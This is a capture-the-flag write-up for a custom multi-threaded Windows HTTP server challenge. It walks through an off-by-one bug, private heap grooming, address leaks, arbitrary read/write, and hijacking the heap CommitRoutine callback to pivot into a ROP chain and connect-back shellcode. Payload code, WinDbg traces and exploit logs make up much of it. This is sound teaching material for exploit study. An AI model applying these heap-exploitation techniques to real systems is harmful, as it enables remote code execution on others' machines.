winhttpd writeup: private heaps pwning on Windows

Following last week-end’s Insomni’hack teaser and popular demand, here is a detailed write-up for my winhttpd challenge, that implemented a custom multi-threaded httpd and was running on the latest version of Windows 10:

This challenge is running on Windows Server 2019, Version 1809 (OS Build 17763.253).

Since multi-threaded servers have obvious isolation issues for a CTF challenge, you had to first connect to a dispatcher service which would spawn an instance for you on a dedicated port, that only your IP was allowed to access. Then you could send as many requests to the httpd as you like as long as the instance didn’t crash and if you kept the dispatcher socket open.

It all starts with a HeapCreate

The server limits the number of concurrent requests to 5, and each request runs in a dedicated thread, which creates a private heap with HeapCreate(0, 0, 0) and finally destroys it with HeapDestroy(hHeap) when the request terminates.
This means that every request has a clean heap and cannot interfere with other requests’ heaps (yet), making it far easier to have deterministic allocations since you don’t have to worry about whatever occurs on the main heap or in other threads. On the other hand, you loose whatever pointers you could have leaked from the main heap.
Private heaps have their own LFH and thus we also start with no LFH enabled, so we can avoid the LFH randomization altogether as long as we don’t create too many objects of the same size.

After opening several threads we can observe that we get the following heaps:

0:006> !heap
Index   Address  Name      Debugging options enabled
  1:   17ccd2c0000                
  2:   17ccd0b0000                
  3:   17ccd220000                
  4:   17ccd4e0000                
  5:   17ccd260000                
  6:   17ccd6d0000                
  7:   17ccd460000                
  8:   17ccd590000

As you can see :

  • unlike mmap on (non-grsec) Linux, all heaps are mapped in memory at with random offsets ; therefore leaking a heap address doesn’t mean we immediately can leak other heaps or libraries
  • all new heaps are aligned on 0x10000 ; that could come in handy for partial overwrites, however I didn’t actually use it in my exploit πŸ˜›

The bugs

The httpd itself doesn’t do much: you can only read local files (without traversal) or login. The login takes username/password/domain parameters, and just greets you if the credentials are valid, or fails. The domain parameter has to be either empty or start with “win.local“, which is the first bug since you can send “win.local.mydomain.com“. This will cause the httpd to open a socket on port 12345 to your domain, send “<username>::<password>” on that socket, and wait for the authentication response.

The other bug lies in the custom strcpy_n function that is used to store various variables in the following http_request struct (which is also stored on the heap shortly after the thread creation):

typedef struct {
    char *key;
    char *value;
} dictionary_entry, *dictionary;

typedef struct {
    SOCKET sockfd;
    HANDLE heap;
    char method[16];
    char filename[256];
    char *query_string;
    char protocol[16];
    char hostname[128];
    dictionary headers;
    size_t headers_count;
    dictionary params; /* GET & POST params */
    size_t params_count;
    char *content; /* POST content */
    size_t content_length;
} http_request;

That function has a NULL off-by-one bug, and is called in the following contexts:

strcpy_n(req->method, cursor, sizeof(req->method));

⇨ overflows filename[0], useless (also the method is invalid so request aborts)

strcpy_n(req->filename, cursor, sizeof(req->filename));

⇨ overflows the first byte of query_string, which could be nice however the query_string isn’t allocated yet (NULL)

req->query_string = (char*)HeapAlloc(req->heap, 0, ptr - cursor + 1);
strcpy_n(req->query_string, cursor, ptr - cursor);

⇨ no overflow

strcpy_n(req->protocol, cursor, sizeof(req->protocol));

⇨ overflows hostname[0], useless

if (!_stricmp(key, "Host") && !*req->hostname) {
    strcpy_n(req->hostname, value, sizeof(req->hostname));

⇨ overflows the headers pointer (pointer to a dictionary, which is an array of key-value pointers)

Only the last one is interesting as it means we can make the headers dictionary – which I’ll refer to as headers** from now on – point to controlled memory.
During the parsing of HTTP headers, key-value pairs are added to the headers dictionary by a dict_add() function:

  • the program loops up to req->headers_count times to check if the same header name already exists
  • if it doesn’t, a new key and value are allocated with HeapAlloc()
    • then the dictionary gets extended with HeapReAlloc() and the new pair is appended to the dictionary
  • if it does, the key remains unchanged
    • if the value is <= to strlen(prev_value), the previous bytes are just edited
    • if it is not, the value gets extended with HeapReAlloc()

So if the headers** points in controlled memory, the parsing of next headers could lead to an arbitrary write by editing a valid key with a value that points wherever we want.
Headers are never printed by the application and thus can’t be used directly for an arbitrary read.
dict_add() is also used to add key-value pairs to the params** dictionary.

The initial leak

Before we go further we need an initial leak to bypass ASLR.
If we manage to put the headers** on top of a valid chunk, we can add a new header to cause a HeapReAlloc on that chunk without having to worry about messing up with the allocator’s metadata (inlined or not): as far as it is concerned, this is a valid demand.
If the new size is more than that of the chunk we overlap with, the allocator will try to extend it. If there is enough free space adjacent to the chunk, that will be used and will just increase the size of our chunk, otherwise it’ll allocate new memory and free the old chunk, thereby allowing us to free the overlapped chunk.

Now there’s a catch: before the headers** gets HeapReAlloc()‘ed, dict_add checks if the new header we’re adding exists already, and will therefore loop against all entries of headers**. Since our off-by-one bug gets triggered on a headers** that has at least one entry (the “Host” header itself), dict_add will always try to dereference a key pointer at least once, which is problematic since we haven’t bypassed ASLR yet.

The idea here is that we can use KUSER_SHARED_DATA, a section of memory that is always mapped at 0x7ffe0000 – as can be observed with !address in WinDbg.

0:007> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
--------------------------------------------------------------------------------------------------------------------------
+        0`00000000        0`7ffe0000        0`7ffe0000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe0000        0`7ffe1000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      Other      [User Shared Data]
+        0`7ffe1000        0`7ffe6000        0`00005000             MEM_FREE    PAGE_NOACCESS                      Free       
+        0`7ffe6000        0`7ffe7000        0`00001000 MEM_PRIVATE MEM_COMMIT  PAGE_READONLY                      <unknown>  [.........5......]
+        0`7ffe7000       bb`f1490000       bb`714a9000             MEM_FREE    PAGE_NOACCESS                      Free       
+       bb`f1490000       bb`f158a000        0`000fa000 MEM_PRIVATE MEM_RESERVE                                    Stack      [~0; 4f8.13c8]
[...]
0:007> dt nt!_KUSER_SHARED_DATA 0x7ffe0000
ntdll!_KUSER_SHARED_DATA
   +0x000 TickCountLowDeprecated : 0
   +0x004 TickCountMultiplier : 0xfa00000
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : 0x8664
   +0x02e ImageNumberHigh  : 0x8664
   +0x030 NtSystemRoot     : [260]  "C:\WINDOWS" 
   +0x238 MaxStackTraceDepth : 0
   +0x23c CryptoExponent   : 0
[...]

That doesn’t contain any useful pointer for us on Windows 10, but it is perfect to survive a pointer dereference. So we just craft a fake header that points to the NtSystemRoot, which is "C\x00" (unicode string).

The GET parameters stored in params** have a urldecoded value, which allows us to store NULL bytes in the value. Furthemore the username and password params can be leaked over the “domain” socket, therefore we can craft our fake header** in one of these, and free the value. The allocator will insert a FreeList entry (Flink + Blink) inside the free chunk, so printing the value will leak us the Flink and thus the position of the heap!

Let’s see how it works. First we register a few breakpoints to pretty-print our allocations:

bp ntdll!RtlAllocateHeap "r @$t1 = @rcx ; r @$t2 = @edx ; r @$t3 = @r8; g"
bp ntdll!RtlReAllocateHeap "r @$t4 = @rcx ; r @$t5 = @edx ; r @$t6 = @r8; r $t7 = @r9 ; g"
bp winhttpd+24C5 ".printf \"----------------------------------------------------------------------------------------------------\\nNew Heap @ %#p\\n\", @rax ; g"
bp winhttpd+24DD ".printf \"req_head          : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2508 ".printf \"http_request      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+2732 ".printf \"req->content      : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+213A ".printf \"req->query_string : HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+36DE ".printf \"    dict_add new key       :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+3715 ".printf \"    dict_add new value     :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+374C ".printf \"    dict_add realloc value : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37FF ".printf \"    dict_add realloc dict  : HeapReAlloc(%#p, %#x, %#p, %#p) -> %#p\\n\", @$t4, @$t5, @$t6, @$t7, @rax ; g"
bp winhttpd+37D0 ".printf \"    dict_add new dict      :   HeapAlloc(%#p, %#x, %#p) -> %#p\\n\", @$t1, @$t2, @$t3, @rax ; g"
bp winhttpd+1D20 ".printf \"Parsing params...\\n\" ; g"
bp winhttpd+22C8 ".printf \"Parsing header...\\n\" ; g"
g

This is the payload I used:

fake_headers = p64(_KUSER_SHARED_DATA + 0x30) * 6

payload = "POST "
payload += "/login?domain=win.local.w3challs.com&password=" + "A" * 0x100 + "&username=" + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "X: " + "Y" * 0x30 + "\r\n"             # [2]
payload += "X: " + "Y" * 0x50 + "\r\n"             # [3]
payload += "A" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [4]
payload += "Host: " + 'X' * 128 + "\r\n"           # [5] trigger off-by-one on headers**
payload += "Z" * 0x40 + ": " + "B" * 0x40 + "\r\n" # [6] HeapReAlloc(headers**) => HeapFree(params[username].value)
payload += "\r\n"

Allocations observed in WinDbg:

0:003> g
----------------------------------------------------------------------------------------------------
New Heap @ 0x17ccd220000
req_head          : HeapAlloc(0x17ccd220000, 0, 0x2000) -> 0x17ccd220860
http_request      : HeapAlloc(0x17ccd220000, 0, 0x1e8) -> 0x17ccd222870
req->query_string : HeapAlloc(0x17ccd220000, 0, 0x1c9) -> 0x17ccd222a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x7) -> 0x17ccd222c40
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x17) -> 0x17ccd222c60
    dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222c80
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222ca0
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x101) -> 0x17ccd222cc0
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222c80, 0x20) -> 0x17ccd222dd0
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x9) -> 0x17ccd222c80
[1] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e00
    dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222dd0, 0x30) -> 0x17ccd222e40
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x2) -> 0x17ccd222dd0
[2] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x31) -> 0x17ccd222e80
[2] dict_add new dict      :   HeapAlloc(0x17ccd220000, 0, 0x10) -> 0x17ccd222ec0
Parsing header...
[3] dict_add realloc value : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x51) -> 0x17ccd222ee0
Parsing header...
[4] dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f40
[4] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd222f90
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222ec0, 0x20) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x5) -> 0x17ccd222ec0
[5] dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x81) -> 0x17ccd222fe0
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e80, 0x30) -> 0x17ccd222e80
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd223070
    dict_add new value     :   HeapAlloc(0x17ccd220000, 0, 0x41) -> 0x17ccd2230c0
[6] dict_add realloc dict  : HeapReAlloc(0x17ccd220000, 0, 0x17ccd222e00, 0x40) -> 0x17ccd223110
[...]
0:006> dps 0x17ccd222e00 L6
0000017c`cd222e00  0000017c`cd223160 [6]
0000017c`cd222e08  0000017c`cd220150 [6]
0000017c`cd222e10  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e18  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e20  00000000`7ffe0030 SharedUserData+0x30
0000017c`cd222e28  00000000`7ffe0030 SharedUserData+0x30

Step-by-step explanation:

  • At [1] we managed to get the username (params[2].value) aligned  with 0x100.
  • At [2] we create a header value whose size is 0x30* ; the headers** size is now 0x10
  • At [3] we realloc that header’s value, leaving a free chunk of size 0x30 available
  • At [4] we create another header, the headers** size is now 0x20, we use a key and value that are larger than 0x30 to avoid consuming the free 0x30 chunk
  • At [5] we perform the off-by-one
    • first the “Host” header is added, the headers** size becomes 0x30, and thus it reuses the free 0x30 chunk
    • the headers** LSBs change from 2e80 to 2e00 because of the off-by-one ⇨ headers** == params[2].value
  • At [6] we add another header, which causes HeapReAlloc to free headers** and allocate headers** further in the heap
    • the allocator puts its Flink and Blink freelist pointers in params[2].value, which we will leak over our “domain socket”

Note*: 0x30 is not the real size, I forgot to consider the terminating NULL bytes and the metadatas’ size in my calculations. It doesn’t matter, what matters is our plan πŸ˜‰ : that an alloc of 0x41 doesn’t fit into a chunk allocated for 0x31

Because at the end of the request handle_client calls HeapFree on all previously allocated pointers, we want to keep our “domain” socket open as long as possible to avoid a crash. That also avoids the HeapDestroy call which would destroy our heap before we can even use our leak.

Leaking NTDLL

winhttpd doesn’t store any function pointer or pointer to its .data section. We’re in a clean heap, is there anything useful for us in there?

All pointers seem to point inside the current heap except this one:

0:006> dps 0x17ccd220000 L100
[...]
0000017c`cd2202b8  00000000`001fe000
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90
0000017c`cd2202c8  00000000`ffffffff
[...]

This is great because we always can find a pointer into NTDLL. Now we need a strategy to leak its value.

Arbitrary read/write

To obtain an arbitrary write primitive we can overwrite the pointers inside header** and params**. params** is more interesting though because we can also leak the values if the param key is either username or password.

Therefore we will want to overlap header** and param** and once again cause a HeapReAlloc(header**) to free the param** chunk.

Payload:

content = "A=" + urlencode(flat(  # [8]
    username_heap_thread_1, ntdll_leak_addr,
    password_heap_thread_1, CommitRoutine_mangled_addr, # spoil for later :P
    password_heap_thread_1, CommitRoutine_mangled_addr,
)) + "&domain=win.local.w3challs.com&" + "&" * 0x100

payload  = "POST "
payload += '/login?a=AAAAAAAAAAAAAAAA&password=' + 'A' * 0xa0 + '&username=BBBBBBBB&username=' + urlencode(fake_headers) # [1]
payload += " HTTP/1.1\r\n"
payload += "Host: " + 'X' * 128 + "\r\n" # [2]
payload += "username: Y\r\n"             # [3]
payload += "X: Y\r\n"                    # [4]
payload += "Content-Length: " + str(len(content)) + "\r\n" # [5]
payload += "X: " + "Y" * 0x50 + "\r\n"   # [6]
payload += "\r\n"
payload += content                       # [7]

Allocations observed in WinDbg:

----------------------------------------------------------------------------------------------------
New Heap @ 0x17ccd260000
req_head          : HeapAlloc(0x17ccd260000, 0, 0x2000) -> 0x17ccd260860
http_request      : HeapAlloc(0x17ccd260000, 0, 0x1e8) -> 0x17ccd262870
req->query_string : HeapAlloc(0x17ccd260000, 0, 0x110) -> 0x17ccd262a60
Parsing params...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262b80
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x11) -> 0x17ccd262ba0
    dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262bc0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262be0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0xa1) -> 0x17ccd262c00
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262bc0, 0x20) -> 0x17ccd262cb0
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262bc0
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262ce0
[1] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262cb0, 0x30) -> 0x17ccd262d00
    dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262ce0, 0x11) -> 0x17ccd262cb0
Parsing header...
[2] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x5) -> 0x17ccd262ce0
[2] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x81) -> 0x17ccd262d40
[2] dict_add new dict      :   HeapAlloc(0x17ccd260000, 0, 0x10) -> 0x17ccd262dd0
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x9) -> 0x17ccd262df0
[3] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e10
[3] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x20) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e30
[4] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[4] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x30) -> 0x17ccd262d00
Parsing header...
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0xf) -> 0x17ccd262e70
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x4) -> 0x17ccd262e90
[5] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd262eb0
Parsing header...
[6] dict_add realloc value : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262e50, 0x51) -> 0x17ccd262f00
[7] req->content      : HeapAlloc(0x17ccd260000, 0, 0x1b2) -> 0x17ccd262f60
Parsing params...
[8] dict_add new key       :   HeapAlloc(0x17ccd260000, 0, 0x2) -> 0x17ccd262e50
[8] dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x31) -> 0x17ccd262d00
[8] dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd262d00, 0x40) -> 0x17ccd263120
    dict_add new key       :   HeapAlloc(0x17ccd260000, 0x80000a, 0x1ca8) -> 0x17ccd262d00
    dict_add new value     :   HeapAlloc(0x17ccd260000, 0, 0x17) -> 0x17ccd262d20
    dict_add realloc dict  : HeapReAlloc(0x17ccd260000, 0, 0x17ccd263120, 0x50) -> 0x17ccd260750
[...]
0:006> da poi(0x17ccd260750)
0000017c`cd222c80  "username"
0:006> dps poi(0x17ccd260750+8) L1
0000017c`cd2202c0  00007ff8`92b33d10 ntdll!RtlpStaticDebugInfo+0x90

Step-by-step explanation:

  • At [1] we managed to get params** aligned with 0x100
  • At [2] we perform the off-by-one
    • first the “Host” header is added and reuses the old "BBBBBBBB" username, the headers** is created with a size of 0x10
    • the headers** LSBs change from 2dd0 to 2d00 because of the off-by-one ⇨ headers** == params**
  • At [3] we add a header, which is actually an old test that I forgot to remove 😜
    • the headers** size is now 0x20, this still fits in the original size of params**: 0x30. Therefore this doesn’t free or moves it.
  • At [4] we add another header with a small value
    • the headers** size is now 0x30, which still fits in the original size of params**
  • At [5] we add the Content-Length header, which is mandatory to send POST params
    • it makes sure there’s an allocated chunk after the value of [4]
    • the headers** size becomes 0x40,Β  which causes HeapReAlloc to free headers** and allocate itΒ further in the heap
      • param** is now free
  • At [6] we edit the value of [4], causing a HeapReAlloc
    • since the chunk can’t be extended that much anymore, it frees it and moves it further in the heap
    • we now have a small chunk available for next step
  • At [7] the POST content is allocated, this doesn’t fit in free chunks and therefore gets allocated at the end of the heap
  • At [8] the first POST param is added to params**
    • All pointers in param** can be dereferenced: the program doesn’t crash
    • the key reuses our previously freed small chunk
    • the value overlaps with the free params** itself so we now fully control the values inside params** ⇨ arbitrary read/write
    • params** gets reallocated, but keeps our crafted key-value pairs

Note that the arbitrary write is limited: we can only edit up to strlen(target) anywhere in memory.

The heap CommitRoutine callback

With the NTDLL base leaked I have no doubt you can find interesting pointers. Many of them seem available but are mangled and without names, which isn’t very cool. You could also leak the TEB and thus other libraries too, unlocking more targets.

On the other hand out of curiosity I wanted to look at what the heap structure looks like. The lame way to find its name (which I used of course) was to google “heap structure windows” which returns this paper as a first result. Then try several of the mentionned structures until one seems legit. Here nt!_HEAP looked ok πŸ™‚

0:006>dt nt!_HEAP 0x17ccd220000
ntdll!_HEAP
   +0x000 Segment          : _HEAP_SEGMENT
   +0x000 Entry            : _HEAP_ENTRY
   +0x010 SegmentSignature : 0xffeeffee
   +0x014 SegmentFlags     : 2
   +0x018 SegmentListEntry : _LIST_ENTRY [ 0x0000017c`cd220120 - 0x0000017c`cd220120 ]
   +0x028 Heap             : 0x0000017c`cd220000 _HEAP
   +0x030 BaseAddress      : 0x0000017c`cd220000 Void
   +0x038 NumberOfPages    : 0xf
[...]
   +0x150 FreeLists        : _LIST_ENTRY [ 0x0000017c`cd222e00 - 0x0000017c`cd223160 ]
   +0x160 LockVariable     : 0x0000017c`cd2202c0 _HEAP_LOCK
   +0x168 CommitRoutine    : 0xf603ad6b`90e97029     long  +f603ad6b90e97029
   +0x170 StackTraceInitVar : _RTL_RUN_ONCE
   +0x178 CommitLimitData  : _RTL_HEAP_MEMORY_LIMIT_DATA
   +0x198 FrontEndHeap     : (null) 
   +0x1a0 FrontHeapLockCount : 0
   +0x1a2 FrontEndHeapType : 0 ''
   +0x1a3 RequestedFrontEndHeapType : 0 ''
   +0x1a8 FrontEndHeapUsageData : 0x0000017c`cd220750  ""
   +0x1b0 FrontEndHeapMaximumIndex : 0x80
   +0x1b2 FrontEndHeapStatusBitmap : [129]  ""
   +0x238 Counters         : _HEAP_COUNTERS
   +0x2b0 TuningParameters : _HEAP_TUNING_PARAMETERS

The CommitRoutine field immediately caught my eye as it sounds like something you can trigger with a large allocation (such as with our Content-Length). The documentation mentions the following:

Callback routine to commit pages from the heap. If this parameter is non-NULL, the heap must be nongrowable. If HeapBase is NULL, CommitRoutine must also be NULL.

However our private heaps are growable since they are created with HeapCreate(0, 0, 0), whose documentation says:

If dwMaximumSize is 0, the heap can grow in size. The heap’s size is limited only by the available memory.

Anyways if we change its value manually in the debugger and trigger a large allocation, it turns out that the callback is indeed called!

0:004> dt nt!_HEAP 1ee`a0a60000 CommitRoutine
ntdll!_HEAP
   +0x168 CommitRoutine : 0x685d9804`f365ca2b     long  +685d9804f365ca2b
0:004> eq 1ee`a0a60000+168 4142434445464748
0:004> g
(25ac.3eac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!guard_dispatch_icall_nop:
00007ff8`92a73030 ffe0            jmp     rax {291fdb40`b6238d63}
0:003> r
rax=291fdb40b6238d63 rbx=000001eea0a60000 rcx=000001eea0a60000
rdx=000000363e8ff980 rsi=000001eea0a64fc0 rdi=000001eea0a64fd0
rip=00007ff892a73030 rsp=000000363e8ff918 rbp=000001eea0a60000
 r8=000000363e8ffa28  r9=0000000000003010 r10=00007ff892af09a0
r11=8080808080808080 r12=0000000000000000 r13=000000000000007f
r14=000000363e8ffa28 r15=000001eea0a602e8
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206

As we can see several registers have values in the heap, with rbx, rcx and rbp pointing to the beginning of the heap. Using this along with our (constrained) arbitrary-write, we should be able to pivot to a ROP/JOP chain.

A quick look inside RtlpFindAndCommitPages (from the Stack Trace) shows a xor rax, cs:RtlpHeapKey before the call to the CFG dispatch function (Control Flow Guard isn’t enabled here).

0:003> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 00000036`3e8ff918 00007ff8`929e8773 : 000001ee`a0a60000 00000000`00000000 00000000`00000020 00007ff8`929e01fe : ntdll!guard_dispatch_icall_nop
01 00000036`3e8ff920 00007ff8`929e8433 : 000001ee`a0a65000 000001ee`a0a60000 00000036`3e8ff9d0 00000000`00000010 : ntdll!RtlpFindAndCommitPages+0x87
02 00000036`3e8ff980 00007ff8`929e07b4 : 00000000`00000040 00000000`00000002 00000000`0000007f 00000000`00004000 : ntdll!RtlpExtendHeap+0x33
03 00000036`3e8ffa10 00007ff8`929dda21 : 000001ee`a0a60000 00000000`00000002 00000000`00003001 00000000`00003010 : ntdll!RtlpAllocateHeap+0xf54
04 00000036`3e8ffc80 00007ff6`58072732 : 00000000`00000000 00000000`00000000 000001ee`a0a60a4f 00007ff6`58070000 : ntdll!RtlpAllocateHeapInternal+0x991
05 00000036`3e8ffd70 00007ff8`8fdb7e94 : 00000000`000000b8 00000000`00000000 00000000`00000000 00000000`00000000 : winhttpd!handle_client+0x292
06 00000036`3e8ffe00 00007ff8`92a3a251 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
07 00000036`3e8ffe30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:003> dq ntdll!RtlpHeapKey L1
00007ff8`92b36808  685d9804`f365ca2b

So the initial value of CommitRoutine was NULL, we can leak the heap XOR key either from a heap or directly in NTDLL.

Finding the address of any heap

This is all great but we can’t trigger a large allocation from any of the previous threads anymore, so we’ll have to create a new one, wait before sending it the HTTP headers, and leak its address in the meantime.

Fortunately NTDLL also keeps a list of our heaps:

0:006> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
--------------------------------------------------------------------------------------------------------------------------
[...]
+      17c`cd460000      17c`cd465000        0`00005000 MEM_PRIVATE MEM_COMMIT  PAGE_EXECUTE_READWRITE             Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
       17c`cd465000      17c`cd46f000        0`0000a000 MEM_PRIVATE MEM_RESERVE                                    Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
[...]
+     7ff8`929d0000     7ff8`929d1000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`929d1000     7ff8`92ae8000        0`00117000 MEM_IMAGE   MEM_COMMIT  PAGE_EXECUTE_READ                  Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92ae8000     7ff8`92b2f000        0`00047000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b2f000     7ff8`92b30000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b30000     7ff8`92b32000        0`00002000 MEM_IMAGE   MEM_COMMIT  PAGE_WRITECOPY                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b32000     7ff8`92b3a000        0`00008000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b3a000     7ff8`92bbd000        0`00083000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
[...]
0:006> .for (r $t0 = 7ff8`92b2f000; @$t0 < 7ff8`92b3a000; r $t0 = @$t0 + 8) { .if (poi(@$t0) >= 17c`cd460000 & poi(@$t0) < 17c`cd465000) { dps $t0 L1 } }
00007ff8`92b33bb0  0000017c`cd460000
0:006> dq 0x7ff892b33b80
00007ff8`92b33b80  0000017c`cd2c0000 0000017c`cd0b0000
00007ff8`92b33b90  0000017c`cd220000 0000017c`cd4e0000
00007ff8`92b33ba0  0000017c`cd260000 0000017c`cd6d0000
00007ff8`92b33bb0  0000017c`cd460000 0000017c`cd590000
00007ff8`92b33bc0  00000000`00000000 00000000`00000000
00007ff8`92b33bd0  00000000`00000000 00000000`00000000

We can launch a new thread and the arbitrary read from above to leak its value.

Stack pivot, ROP, shellcode

We have RIP and rbp points to the heap, so we can look for a “leave ; pop ; ret” pivot gadget. This one does the trick:

# leave ; ⇨ mov rsp, rbp ; pop rbp
# mov rbx, qword [rsp+0x18]
# mov rax, rcx
# mov rbp, qword [rsp+0x20]
# mov rsi, qword [rsp+0x28]
# mov rdi, qword [rsp+0x30]
# pop r15
# pop r14
# ret
pivot_gadget = ntdll_base + 0x010442e

The above gadget pivots to the beginning of the heap (rbp) and pops 3 values off the pivoted stack, therefore we must control heap+0x18, which is SegmentListEntry, a heap entry without NULL bytes in its LSBs – so we can edit it.
So, we overwrite:

  • heap+0x168 (CommitRoutine) with pivot_gadget ^ RtlpHeapKey
  • heap+0x18 (SegmentListEntry) with a large “add rsp, 0xXXX” gadget:
    • 0x0d26c4: add rsp, 0x0000000000000CD0 # pop rbx # ret

Now we can store a retsled followed by a ROP chain. Since I didn’t bother to leak any other libs from NTDLL I decided to ROP directly to ntdll!NtProtectVirtualMemory, the syscall used behind the scenes by VirtualProtect – which allows to change the heap page permissions to RWX.

At this point we just need to store a connect-back shellcode after the ROP and jump into it to finally get our shell and read the flag!

$ ./sploit.py 172.16.62.153 42003
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19224
[+] Opening connection to 172.16.62.153 on port 42003: Done
[*] heap leak: 0x17ccd223160
[+] heap of thread 1 @ 0x17ccd220000
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19225
[+] Opening connection to 172.16.62.153 on port 42003: Done
